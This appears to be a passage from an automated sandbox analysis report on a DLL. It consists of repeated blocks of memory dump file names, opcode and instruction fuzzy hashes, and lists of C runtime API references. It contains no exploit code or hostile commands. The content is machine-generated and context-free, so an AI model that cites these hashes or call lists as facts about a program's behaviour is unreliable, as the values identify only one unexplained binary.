    • Opcode Fuzzy Hash: 163c3d9e0ded9eafb69a88deaa52aef34a73af8a6913d69e5037214107004f37
    • Instruction Fuzzy Hash: 10916C71A001698BEB2ACE18C880BEDB7B5FF89314F1544EBD91DAB644E7309E518F81
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8b1e628aeeb786b86434b4c38da3f1298702e21560058f08f9f6959233ecf6d8
    • Instruction ID: 002d7769c84ac17e236b83f5ddbed93f632783e0b7b3dff99b99ecfaec85aede
    • Opcode Fuzzy Hash: 8b1e628aeeb786b86434b4c38da3f1298702e21560058f08f9f6959233ecf6d8
    • Instruction Fuzzy Hash: 7E21B373F205394B7B0CC47E8C522BDB6E1C68C501745823AE9A6EA2C1D96CD927E2E4
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8e729d937fb4018002de310d8a11df743e1553277fc45766df31947286ff2478
    • Instruction ID: 94d7458026fd68bdd6cd5740ca499d12567aed24f96de128dc4e54b6f88d7cdf
    • Opcode Fuzzy Hash: 8e729d937fb4018002de310d8a11df743e1553277fc45766df31947286ff2478
    • Instruction Fuzzy Hash: 1411C663F30C255B675C81AD8C132BAA5D2EBD825074F533AD826E72C4E9A4DE23C290
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8ff1cb78e32ae146548e22ff14f87eef2acb296564cdd3ed07412dab13f8cec2
    • Instruction ID: 5f2a1bee43f29c2edce9a0e391b6698ce95958acd572829bd761a4523066ed04
    • Opcode Fuzzy Hash: 8ff1cb78e32ae146548e22ff14f87eef2acb296564cdd3ed07412dab13f8cec2
    • Instruction Fuzzy Hash: 90F096726642659BCB0EDE5C8908BB977A8EF46B10F128451F201DBA95C6B0DF00C7C2
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 88b988e3ef355540a2796d9dd0c7b8a8b64a01f9c6079882581130843401c8df
    • Instruction ID: 6c94519ea21ae0ad2f38388cb49b2ab22711831783d3edefa8e2d18ab1387573
    • Opcode Fuzzy Hash: 88b988e3ef355540a2796d9dd0c7b8a8b64a01f9c6079882581130843401c8df
    • Instruction Fuzzy Hash: BBF06D71244209EBCB0ECE6CC954F6977E4B756749F11C851E206DBA80CA30EA40CA02
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: aaf8164123ba013f1ed40cd1de181d3c4f3ea24339cfed0df915be3faa90a796
    • Instruction ID: 1abb7de466d87f1efdce8d49fe879ea0e5a345ec8fc3eb474f6e33cbfd4d0569
    • Opcode Fuzzy Hash: aaf8164123ba013f1ed40cd1de181d3c4f3ea24339cfed0df915be3faa90a796
    • Instruction Fuzzy Hash: 19F03971A15324EBCB1ACB4CC504B9973BCEB85B54F12849AE545EB691C7B0DE40CBC2
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 129942238b68353749ed1e5b8a1b8ae20044b8a18fbfd5ea88184982f599d4f6
    • Instruction ID: 753744aba268d49bf6423f442a230d82ae736e1eaa4af4754e28fa388fb9d93c
    • Opcode Fuzzy Hash: 129942238b68353749ed1e5b8a1b8ae20044b8a18fbfd5ea88184982f599d4f6
    • Instruction Fuzzy Hash: 2DF0A071A142389FCB1AC788C508B5973F8EB45B55F128066E6009B540C770DD00CBC1
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74103869283bf6322fddda879bd33bf6285212276094735ad12266acd8ab46a7
    • Instruction ID: bd027b6f774d503577b833181a32b4561fcd08eb776be01a4dd0d57b7bf4e0e5
    • Opcode Fuzzy Hash: 74103869283bf6322fddda879bd33bf6285212276094735ad12266acd8ab46a7
    • Instruction Fuzzy Hash: BBE09271600304DFCB09CF59C540B4E77F9EB49785F218064E509D7A90D734DE40CB41
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 312861b8b42d4ac363a7b392bdf5e1b83ce71d4d25f9518ac30f1b8ac77ba435
    • Instruction ID: a57146da1bccbe070561fba53e0a3b331a96b99cf5d32e185859663d54952380
    • Opcode Fuzzy Hash: 312861b8b42d4ac363a7b392bdf5e1b83ce71d4d25f9518ac30f1b8ac77ba435
    • Instruction Fuzzy Hash: 9EE06D71601304DFCB0ACB59C248B4D77F8EB45385F158478E505C7A80D734DE40CB41
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 03faacaab80771049c7de340b2cf33d4dabd948303e568a4dfb3d1bf5a57dd98
    • Instruction ID: 8c5694880d8849ba821f6b95353de26dc5b2cd33d6cdfeb28d658f6529d8cc71
    • Opcode Fuzzy Hash: 03faacaab80771049c7de340b2cf33d4dabd948303e568a4dfb3d1bf5a57dd98
    • Instruction Fuzzy Hash: 2BE08C32911238EBCB1ADB88CA40A9AB3FCEB85B00B11889AF612D3600D270DE00C7C1
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e6be120ad982125470bddd2a1b60df299cdb972454583cf594d965aff8ddd0a7
    • Instruction ID: cfa8e4808116207827de0b42c20f8b0c4d32f0d235446ef7406e28c804e65d07
    • Opcode Fuzzy Hash: e6be120ad982125470bddd2a1b60df299cdb972454583cf594d965aff8ddd0a7
    • Instruction Fuzzy Hash: 94E01735505248EFCB08DFA8C548F8EB7F8EB887A8F2188A4E605D7650D734EF80DA41
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
    • String ID: LASm
    • API String ID: 1186856153-592170012
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D53469F
    • DName::operator+.LIBCMT ref: 6D5347D5
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+.LIBCMT ref: 6D534821
    • DName::operator+.LIBCMT ref: 6D534830
    • DName::operator+.LIBCMT ref: 6D53478B
      • Part of subcall function 6D535D7E: DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    • DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator=.LIBVCRUNTIME ref: 6D53499D
    • DName::DName.LIBVCRUNTIME ref: 6D5349B5
    • DName::operator+.LIBCMT ref: 6D5349C4
    • DName::operator+.LIBCMT ref: 6D5349D0
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    Strings
    Similarity
    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
    • String ID: <JSm$<JSm
    • API String ID: 1026175760-1629668186
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: _free$___from_strstr_to_strchr
    • String ID:
    • API String ID: 3409252457-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: _free$Info
    • String ID:
    • API String ID: 2509303402-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___free_lconv_mon.LIBCMT ref: 6D54CA40
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D295
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2A7
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2B9
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2CB
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2DD
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2EF
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D301
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D313
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D325
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D337
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D349
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D35B
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D36D
    • _free.LIBCMT ref: 6D54CA35
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54CA57
    • _free.LIBCMT ref: 6D54CA6C
    • _free.LIBCMT ref: 6D54CA77
    • _free.LIBCMT ref: 6D54CA99
    • _free.LIBCMT ref: 6D54CAAC
    • _free.LIBCMT ref: 6D54CABA
    • _free.LIBCMT ref: 6D54CAC5
    • _free.LIBCMT ref: 6D54CAFD
    • _free.LIBCMT ref: 6D54CB04
    • _free.LIBCMT ref: 6D54CB21
    • _free.LIBCMT ref: 6D54CB39
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: shared_ptr$operator+$Name::operator+Name::operator=
    • String ID: 4CSm
    • API String ID: 1464150960-2386857985
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    Strings
    Similarity
    • API ID: Name::operator=Replicator::operator[]
    • String ID: @$U*Sm$U*Sm$generic-type-$template-parameter-
    • API String ID: 3211817929-2970717911
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52EFB6
    • type_info::operator==.LIBVCRUNTIME ref: 6D52EFDD
    • ___TypeMatch.LIBVCRUNTIME ref: 6D52F0E9
    • CatchIt.LIBVCRUNTIME ref: 6D52F13E
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52F1C4
    • _UnwindNestedFrames.LIBCMT ref: 6D52F24B
    • CallUnexpected.LIBVCRUNTIME ref: 6D52F266
    Strings
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D5351F2
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5351FD
    • DName::DName.LIBVCRUNTIME ref: 6D53520E
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352B3
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352D0
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352ED
    • DName::operator+.LIBCMT ref: 6D535302
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D535325
    • swprintf.LIBCMT ref: 6D535396
    • DName::operator+.LIBCMT ref: 6D5353ED
      • Part of subcall function 6D53327D: DName::DName.LIBVCRUNTIME ref: 6D5332A1
    Similarity
    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
    • String ID:
    • API String ID: 3689813335-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D54333D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D543349
    • _free.LIBCMT ref: 6D543354
    • _free.LIBCMT ref: 6D54335F
    • _free.LIBCMT ref: 6D54336A
    • _free.LIBCMT ref: 6D543375
    • _free.LIBCMT ref: 6D543380
    • _free.LIBCMT ref: 6D54338B
    • _free.LIBCMT ref: 6D543396
    • _free.LIBCMT ref: 6D5433A4
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: __aulldvrm
    • String ID: :$f$f$f$p$p$p
    • API String ID: 1302938615-1434680307
    • Opcode ID: 2646751b7fd640333477a9eeb339a3151543b3cfc0cc93f179af0ca8300b2ec6
    • Instruction ID: 42a05122d70d77dc55051bbde9d8cb4f87b0f4742a657b8a175e59242a351e66
    • Opcode Fuzzy Hash: 2646751b7fd640333477a9eeb339a3151543b3cfc0cc93f179af0ca8300b2ec6
    • Instruction Fuzzy Hash: FC026075A042298AEB38CFA5C8546DDB7B6FF42B14FA0C655D428FBA84D7708D84CB13
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D532C4D
    • DName::DName.LIBVCRUNTIME ref: 6D532C7A
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D532C95
    • DName::DName.LIBVCRUNTIME ref: 6D532CB2
    • DName::DName.LIBVCRUNTIME ref: 6D532CE2
    • DName::DName.LIBVCRUNTIME ref: 6D532CEC
    • DName::DName.LIBVCRUNTIME ref: 6D532D13
    Strings
    Similarity
    • API ID: NameName::$Name::operator+__aulldvrm
    • String ID: |^Sm
    • API String ID: 4069495278-3290091760
    • Opcode ID: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction ID: ddad8e9ba5f29ef7ed9f30353ac7c258c373e38ac6fb69f01fdd0d6216ed0fe4
    • Opcode Fuzzy Hash: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction Fuzzy Hash: 4D31E471848628AACF1DCFADC890BED7BB4FF46314F128849E151A7980F7709946CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5fa74e730998fbfef68c92422f802955dd9b92352180db27982b708783de8249
    • Instruction ID: 1a7f360229486d089b1fa21ae6b7e2d6bb0b7e81e939b09ae9cda00e5081ef25
    • Opcode Fuzzy Hash: 5fa74e730998fbfef68c92422f802955dd9b92352180db27982b708783de8249
    • Instruction Fuzzy Hash: 4BC10A70D0824A9FEF0BCF99C880BADBBB4BF4A304F01C55AE51597A51C7319A51CF61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 3608cc2aaa05890a61b1256e9cc0e066684c5fd6b5116d675faadab2b0385e6b
    • Instruction ID: e4cc02aa52e48bb11e5ac516726059f627169ffc87f09e439f1b684747f2b6ee
    • Opcode Fuzzy Hash: 3608cc2aaa05890a61b1256e9cc0e066684c5fd6b5116d675faadab2b0385e6b
    • Instruction Fuzzy Hash: 7961E5729143459FDB19CF64C840BBAB7F8EF85710F11C86AEA55EBA80EB709D40CB52
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 9b297a60c3272bff851df2e0d8365968c7271a9b54bf81cddbb9df9daed1b770
    • Instruction ID: b0148fd6d870f852d17cd6a71daf098ccb32e60f49ea483b7a5fc2cd467fb2ec
    • Opcode Fuzzy Hash: 9b297a60c3272bff851df2e0d8365968c7271a9b54bf81cddbb9df9daed1b770
    • Instruction Fuzzy Hash: FBE13B75E0421A9FCB18CFA8C8809EEFBF5EF88314B15856AD915E7740E731AE418B91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • _free.LIBCMT ref: 6D54543D
    • _free.LIBCMT ref: 6D545456
    • _free.LIBCMT ref: 6D545494
    • _free.LIBCMT ref: 6D54549D
    • _free.LIBCMT ref: 6D5454A9
    Strings
    Similarity
    • API ID: _free$ErrorLast
    • String ID: C
    • API String ID: 3291180501-1037565863
    • Opcode ID: 59b9cee76819fc44d4dd9bde9baac096c3fcfe1ecd89242ddd659ef0a71c7a94
    • Instruction ID: 221bbbe7e6ddbc3bada16b3dcbc9113a2cecc7408e0312fcb30422995fd90e62
    • Opcode Fuzzy Hash: 59b9cee76819fc44d4dd9bde9baac096c3fcfe1ecd89242ddd659ef0a71c7a94
    • Instruction Fuzzy Hash: 57C1707590521A9FDB28DF18C884BADB7B4FF49304F1189EAE909A7750D770AE90CF41
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D531995
    • DName::operator+.LIBCMT ref: 6D5319E8
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D5319D9
    • DName::operator+.LIBCMT ref: 6D531A39
    • DName::operator+.LIBCMT ref: 6D531A46
    • DName::operator+.LIBCMT ref: 6D531A8D
    • DName::operator+.LIBCMT ref: 6D531A9A
    Similarity
    • API ID: Name::operator+$shared_ptr
    • String ID:
    • API String ID: 1037112749-0
    • Opcode ID: 85ee0d4c35ca8cbdfee6785217d5f9520651aa244aba59cf70b67a3f4176c568
    • Instruction ID: 8cc7a12e431c3729dda3184b6bb2bc2c53b86a3efcb060568d8263b3794ea76b
    • Opcode Fuzzy Hash: 85ee0d4c35ca8cbdfee6785217d5f9520651aa244aba59cf70b67a3f4176c568
    • Instruction Fuzzy Hash: BF515471904328ABDF0DCFA4D855EEEBBB8EF48714F02445AE605A7580FB709A44CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FindFirstChangeNotificationW.KERNEL32(6D5765F0,00000001,00000002,00000001,00000000,?,00000000,?,?,6D52A9C8,?,00000001,00000000,?,00000001,00000000), ref: 6D529BAC
    • GetEnvironmentVariableW.KERNEL32(pos,6D5765F0,0000046C,?,00000000,?,?,6D52A9C8,?,00000001,00000000,?,00000001,00000000,?,00000001), ref: 6D529C4C
    Strings
    Similarity
    • API ID: ChangeEnvironmentFindFirstNotificationVariable
    • String ID: T@Wm$p@Wm$pos$|@Wm
    • API String ID: 3880921956-625402339
    • Opcode ID: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction ID: 056b6ea205a3d9f54d750bf959eb7774311ffb0b00422237921ebc2038dbc496
    • Opcode Fuzzy Hash: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction Fuzzy Hash: DF51EFB25442218FCF18CF28E8847B577F1F79B202B27462AE8559BF94F7745848CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _ValidateLocalCookies.LIBCMT ref: 6D52E6B7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6D52E6BF
    • _ValidateLocalCookies.LIBCMT ref: 6D52E748
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6D52E773
    • _ValidateLocalCookies.LIBCMT ref: 6D52E7C8
    Strings
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: 2c23aa4282f84cb853648c5d7e7ae1e2889f627aaa8b6dbe748fd4cdbc798f27
    • Instruction ID: f94f3fed9b4fdd98a0b42d5a7c117e4e1fabbabe57137155f48bfc45716e9551
    • Opcode Fuzzy Hash: 2c23aa4282f84cb853648c5d7e7ae1e2889f627aaa8b6dbe748fd4cdbc798f27
    • Instruction Fuzzy Hash: B041F634A042499FCF08CF78C880AAE7BB5BF45318F188555E924DBBD1DB31E909CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: NameName::
    • String ID: %lf$A
    • API String ID: 1333004437-43661536
    • Opcode ID: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction ID: 00a28af2d3f94d9731373130d1b5d8fe4acdc91d99ed917487ff96fa34ed6ece
    • Opcode Fuzzy Hash: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction Fuzzy Hash: DD31BF70D08268DFEF0DCFE8C844A9DBBB4BF06344F02845EE541ABA80EBB49845CB01
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: C:\Windows\SYSTEM32\loaddll32.exe$nTm
    • API String ID: 0-1147561974
    • Opcode ID: 2f6822bea930d50e168ac42fd03f2e528d99322be2ca1eb18cb2879d2a0d7441
    • Instruction ID: 4dd8a12ea6d2bd152bb2ee82b1c6aa1c2ae69237d60635b04c6d44a03256f2f7
    • Opcode Fuzzy Hash: 2f6822bea930d50e168ac42fd03f2e528d99322be2ca1eb18cb2879d2a0d7441
    • Instruction Fuzzy Hash: FF21C27160830ABFA7199EA58C80AEB77ADEF41368701CA24E91897950E730EC5087E2
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction ID: e104195a36241c2f6cf32de74cfb38b75895c99db78d9499ec9cb6f28871afe4
    • Opcode Fuzzy Hash: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction Fuzzy Hash: 86212E31946122EBDB1686288E80B5A3F78AF467A0F11C922FD56FFA90D730DC0085E3
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D54DA16: _free.LIBCMT ref: 6D54DA3B
    • _free.LIBCMT ref: 6D54DD79
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54DD84
    • _free.LIBCMT ref: 6D54DD8F
    • _free.LIBCMT ref: 6D54DDE3
    • _free.LIBCMT ref: 6D54DDEE
    • _free.LIBCMT ref: 6D54DDF9
    • _free.LIBCMT ref: 6D54DE04
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: d917ed618925ab323780e785bb5292540701fc50299451549717a17e1d811044
